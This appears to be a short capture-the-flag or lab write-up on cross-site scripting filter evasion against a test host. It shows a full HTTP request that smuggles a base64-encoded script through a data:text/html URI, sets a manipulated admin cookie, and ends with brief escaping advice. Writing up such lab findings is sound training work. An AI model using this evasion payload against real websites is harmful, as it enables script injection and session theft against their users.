Vulterability 12
------

Type: `xss filter evasion` :   

Request page : `http://10.11.200.146/?page=media`   

Request media page with xss filter evasion:
```
GET http://10.11.200.146/?page=media&src=data:text/html;base64,PHNjcmlwdD5hbGVydChPTUcgVEhJUyBJUyBJTlNBTkUpPC9zY3JpcHQ+ HTTP/1.1
Host: 10.11.200.146
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Connection: keep-alive
Upgrade-Insecure-Requests: 
```

this is interesting we could change the argument type to html..    
if data is html the page will interpret our next arg

There is also a filter evasion. We need to encode our `<script>alert()</script>`, base64 is fine : 
```
base64,PHNjcmlwdD5hbGVydChPTUcgVEhJUyBJUyBJTlNBTkUpPC9zY3JpcHQ+
```
We had this to our initial request and the `alert()` is executed.

### Resolv ?
- Never Insert Untrusted Data Except in Allowed Locations
- HTML and javascript Escape Before Inserting data
